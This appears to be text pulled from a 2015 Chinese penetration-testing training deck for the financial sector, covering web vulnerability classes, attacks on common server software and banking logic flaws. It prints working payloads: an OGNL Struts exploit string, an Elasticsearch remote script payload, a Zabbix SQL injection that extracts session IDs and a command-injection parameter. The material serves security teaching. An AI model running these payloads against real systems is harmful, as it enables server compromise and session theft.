信息安全技术培训_渗透测试

信息安全技术培训——渗透测试、演示刘冬2015-3-28V1.0•什么是渗透测试•应用程序渗透测试方法•互联网攻击常见手段•金融行业安全测试什么是渗透测试•渗透测试（PenetrationTesting）——是为了证明网络防御按照预期计划正常运行而提供的一种机制。实现原理：依据对已知或未知漏洞测试、模拟攻击目地重点：降低风险、完善目前的安全策略特点人工检测、工具扫描、可控非破坏什么是渗透测试•渗透测试流程渗透测试•渗透测试工具BurpSuiteHttpAnalvzerIEWatchFiddlerFireBugCharlesHttpliveheadersSQLmapNmapAwvsAppscanHP-WebinspectCoreImpactMetasploitNessusNexpose•什么是渗透测试•应用程序渗透测试方法•互联网攻击常见手段•金融行业安全测试基于Web渗透测试扫描解析输入Web主机风险信息收集解析应用程序分析应用程序，会话机制、客户端控件等SQL、XSS、RFI等测试代理、配置不当，中间件等识别分析与利用Hacking•OWASPTOP10–注入漏洞–跨站脚本–失效的身份验证和回话管理–不安全的直接对象引用–CSRF–安全配置错误–不安全的加密存储–没有限制URL访问–传输层保护不足–未验证的重定向和转发Hacking•注入漏洞——SQL注入Select*fromtable_namewhereid=1Select*fromtable_namewhereid=1’Select*fromtable_namewhereid=1and1=1Select*fromtable_namewhereid=1and1=2Select*fromtable_namewhereid=1and(select……)InjectionTools:1、SQLHelper2、SQLMAP(v1.0d)Hacking•注入漏洞——SQL注入事实上，对错误信息进行封装并不一定能阻止攻击者的入侵行为，封装的错误信息，但是攻击己经形成，有攻击者能根据封装的错误信息对攻击结果进行判断，继续实施攻击。其实盲注就是通过封装的消息来收集攻击过程中需要的信息。10Hacking•注入漏洞——命令注入POST/aim/synRequest.doHTTP/1.1



method=trace_route&ip=192.168.1.1&m=5&w=2|ifconfig11Hacking•跨站脚本–存储型–反射型–DOM型12Hacking•跨站脚本–原理简单，利用却不简单WEB2.0是XSS的新温床XSS/CSRFWORM：Samyworm&Sinaweiboworm1、跨站URL：=//=update2、由JS发起CSRF：a、发微博b、加关注c、发私信AboutSamyWorm:(XSS)•任意文件读取14Hacking•任意文件读取15Hacking•任意文件读取16Hacking•任意文件读取17Hacking•任意文件读取18Hacking•上传漏洞——修改参数19Hacking•上传漏洞——欺骗20Hacking•上传漏洞——APP客户端21Hacking•认证错误——原始信息的校验方式1、不校验——直接构造恶意数据修改密码2、校验COOKIE——CSRFHacking•目录遍历——移动代理服务器23Hacking•错误信息——“友好”的返回信息24Hacking•错误信息——HTTPFuzzing对错误信息的利用Hacking•参数错误——权限的鉴别://site/d477340ffa28755c?EditDocumentOpenDocumentEditDocumentHacking•参数错误——权限的鉴别=/path/down_file.rarHacking•参数错误——权限的鉴别=/path/down_file.rarHacking•逻辑错误一个密码找回的逻辑错误获取验证码为5为纯数字，有效期为30分钟，可以暴力破解。通过HTTPFUZZING获得Hacking•逻辑错误Hacking•逻辑错误一个密码找回的逻辑错误Hacking•逻辑错误修改任意账号密码32•什么是渗透测试•应用程序渗透测试方法•互联网攻击常见手段•金融行业安全测试互联网攻击•常见的DjangoCacti0dayFreenasHudsonSquidBeanshellZabbixJboss…互联网攻击•互联网攻防Struts演示如何利用Struts进入你的服务器?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}35互联网攻击•互联网攻防Struts演示36互联网攻击•互联网攻防Struts演示梦网合作自助服务12590远程代码执行37互联网攻击•互联网攻防Struts演示移动学院38互联网攻击•互联网攻防HeartbleedOpenSSL1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta1ofOpenSSL1.0.2等版本39互联网攻击•互联网攻防SplunkXSSOpenSSLTLS心跳信息泄漏漏洞未授权访问代码执行40互联网攻击•互联网攻防Splunk代码执行41互联网攻击•互联网攻防SAP漏洞演示SAPNetWeaver是基于专业标准的集成化应用平台，能够大幅度降低系统整合的复杂性。其组件包括门户、应用服务器、商务智能解决方案以及系统整合和数据整合技术。42互联网攻击•互联网攻防Hadoop通过hadoop,hbase，hdfs0.2RC版本的管理web端能远程执行命令，通过该节点对集群服务器进行任务分发（该是基本功能，当然可以进行批量提权linux主机）渗透进hadoop集群。43互联网攻击•互联网攻防Elasticsearch:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22os.name\%22)%2b\%22-\%22%2bSystem.getProperty(\%22user.name\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}44互联网攻击•互联网攻防Zend,ThkphpZendframework读取任意文件Demo选择的原因:脚本小子只会读取任意文件，高级黑客能拿来做什么？1.内网端口扫描2.内网服务器攻击3.HTTP攻击4.暴力破解45互联网攻击•互联网攻防Cacti0day如何利用Cacti进入你的服务器0day互联网攻击•互联网攻防ZabbixZabbix弱口令SQl注入httpmon.php?applications=2and(select1from(selectcount(*),concat((select(selectconcat(cast(concat(sessionid,0x7e,userid,0x7e,status)aschar),0x7e))fromzabbix.sessionswherestatus=0anduserid=1LIMIT0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)互联网攻击•互联网攻防Zenoss互联网攻击•互联网攻防Hudson创建任务Buildamaven2projectBuild写入execwinshellBuildnow互联网攻击•互联网攻防HudsonHiveHQL可以通过transform自定义Hive使用的Map/Reduce脚本，从而调用shell/python等语言，默认皆可用，导致攻击者可以通过hive接口等相关操作方式直接获取服务器权限。互联网攻击•互联网攻防Jboss认证绕过控制台密码JMXinvokerServlet51互联网攻击•LDAP52互联网攻击•互联网攻防Rsync,NFSCMS生成html静态文件通过rsync发布DemoNFS漏洞利用…53互联网攻击•互联网攻防VmwareVMwarevCenterOrchestrator在Web管理工具的实现上存在安全漏洞，可被利用泄露vCenter服务器密码。互联网攻击•互联网攻防F5在多家银行测试发现，导致内网信息泄露互联网攻击•互联网攻防F5登陆绕过验证F5多种设备和9.x/10.x/11.x等多个版本的ssh登录存在root帐号绕过验证的重大漏洞•什么是渗透测试•应用程序渗透测试方法•互联网攻击常见手段•金融行业安全测试常见漏洞•SQL注入•Xss跨站脚本攻击•1元购买任意商品•查看任意账号支付额度•修改任意用户密码•转账漏洞•查看任意账号的账户金额•查看任意用户的身份信息•短信炸弹•……这种可能性有多大？其他方向•SSRF(服务端请求伪造)如果你的ERP有漏洞，并且存在一个XXE的漏洞那么它通过一个webservices来攻击你的内部核心ERP.其他方向•SSRF(服务端请求伪造)•ORACLEpeoplesoft1.环境克隆导致的问题2.ORACLEERP默认密码3.ORACLEERP权限问题•ORACLEERPiscript问题1.ORACLEERP中间件问题2.ORACLEERP数据库问题其他方向•Pentesting攻防HaddoopOpenstackSpringHibernateIbatisMongodb…其他方向设计缺陷弱口令未授权访问敏感信息网络渗透环境配置不合理致命危害权限绕过拓扑图泄露识别分析与利用安全测试•应用系统漏洞测试点--业务复杂容易产生业务的逻辑安全问题--问题ALL输入测试测试方法：提交恶意参数，观察返回结果2020/7/7•某商行网银渗透测试结果2020/7/7•某商行APP渗透测试结果权限控制漏洞最常见和最普遍的漏洞，重点测试•通过越权的查询操作可导致未授权的用户直接访问不应用访问的资源，导致一些敏感信息的泄露，其